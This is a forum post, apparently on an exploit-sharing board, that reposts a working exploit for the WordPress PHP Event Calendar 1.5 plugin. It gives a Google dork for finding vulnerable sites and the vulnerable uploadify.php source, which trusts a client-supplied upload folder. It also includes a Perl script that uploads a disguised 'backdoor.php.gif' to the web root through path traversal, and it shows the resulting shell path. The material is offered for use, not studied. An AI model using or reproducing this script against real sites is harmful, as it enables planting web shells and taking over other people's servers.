Jump to content
Aerosol

WordPress PHP Event Calendar 1.5 Arbitrary File Upload

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

######################################################################
# Exploit Title: Wordpress PHP Event Calendar Plugin - Arbitrary File Upload
# Google Dork: inurl:/plugins/php-event-calendar/
# Date: 02.04.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Source Plugin: https://wordpress.org/plugins/php-event-calendar/
# Vendor HomePage: http://phpeventcalendar.com/
# Version: 1.5
# Tested on: MSwin
######################################################################

# Path of File : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php
# Vulnerable File : uploadify.php

<?php
/*
Uploadify
Copyright (c) 2012 Reactive Apps, Ronnie Garcia
Released under the MIT License <http://www.opensource.org/licenses/mit-license.php> 
*/

// Define a destination
//$targetFolder = '/uploads'; // Relative to the root
$targetFolder = $_POST['targetFolder']; // wp upload directory
$dir = str_replace('\\','/',dirname(__FILE__));

//$verifyToken = md5('unique_salt' . $_POST['timestamp']);

if (!empty($_FILES)) {
    $tempFile = $_FILES['Filedata']['tmp_name'];
    //$targetPath = $dir.$targetFolder;
    $targetPath = $targetFolder;
    $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];
    $targetFile = rtrim($targetPath,'/') . '/' . $fileName;

    // Validate the file type
    $fileTypes = array('jpg','jpeg','gif','png'); // File extensions
    $fileParts = pathinfo($_FILES['Filedata']['name']);

    if (in_array($fileParts['extension'],$fileTypes)) {
        move_uploaded_file($tempFile,$targetFile);
        echo '1';
    } else {
        echo 'Invalid file type.';
    }
}
?>


# Exploit

#!/usr/bin/perl

use LWP::UserAgent;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print "\t   +===================================================\n";
print "\t   | PHP event Calendar Plugin - Arbitrary File Upload \n";
print "\t   | Author: CrashBandicot\n";
print "\t   +===================================================\n\n";

die "usage : perl $0 backdoor.php.gif" unless $ARGV[0];

 $file = $ARGV[0];

my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
my $ch = $ua->post("http://127.0.0.1/wp-content/plugins/php-event-calendar/server/classes/uploadify.php", Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content;
if($ch = ~/1/) { 
print "\n  [+] File Uploaded !";
} else { print "\n  [-] Target not Vuln"; }

__END__


# Path Shell : http://localhost/0day_backdoor.php.gif

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...